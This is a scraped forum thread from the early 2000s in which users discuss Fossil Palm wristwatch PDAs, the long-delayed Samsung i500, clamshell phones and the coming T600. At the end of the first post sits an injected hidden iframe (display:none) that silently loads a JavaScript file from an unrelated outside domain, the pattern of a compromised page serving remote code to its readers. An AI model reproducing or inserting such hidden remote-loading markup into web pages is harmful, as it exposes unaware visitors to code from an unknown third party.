Has anyone used the new palm watches from fossil (available on Amazon for delivery on 7/21)? I'm considering dumping my quest for the i500 for the wristwatch pda (similar featureset to Zire) and a separate clamshell that can synch with outlook.

Frankly, I don't need the large amounts of RAM or fancy features. My primary use of my palm now is calendar and contacts; plus a password app or two. Games and other features are nice; but not mandatory.

Anyone have any suggestions on some other stuff I may miss out on if I go this route? Which clamshell currently is Sprint's best (keeping in mind the synch needs)?

And please don't suggest the Treo 600, I'm a clamshell only guy - I'm tired... really really tired of candybars. :o<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think it has the 33mhz proc and it's only 2mb of ram, also not equipped for internet access, greyscale screen, etc etc etc. It is not a bad option, but makes you look like King Geek.

Also I've heard its delayed until the end of July... =(

Yeah... I guess it makes sense if you just can't stand to have a PDA in your pocket, but it isn't exactly stylish. Most people consider watches jewelry, so I don't think that something that ugly is gonna go over well. It's a little ahead of its time.

I'm not buying anything from Samsung. The i500 MUST be a POS for this much delay due to "software problems" and "software revisions" or whatever is the excuse of the day for the reason this phone is so freakin delayed.

As a i330 user since Jan and dealing with the FSOD problem on a regular, recurring basis, I can't imagine somethine with even more severe problems. Remember, the i330 passed all testing and was considered good to go.

Anyway, just coming up with some more dirt to try to make the i500 look bad so I can convince myself to cancel my preorder and just wait for the t600.

The T600 is gonna ROCK!!!

I have learned my lesson, the key is to name your thread with the i500 even if it has nothing to do with the i500

so like i wanted to post about the new goggles/ view finder. I titled it, My first accessory for the i500. If i would have titled it Neat Glass View Finder Thingy ,it would have been moved

anyway, this will happen more and more fi the i500 comes out. Although i'm figuring the mass of geeks will wait for the T600, preventing them from getting the i5 AND cutting down on the number of forum types and hackers
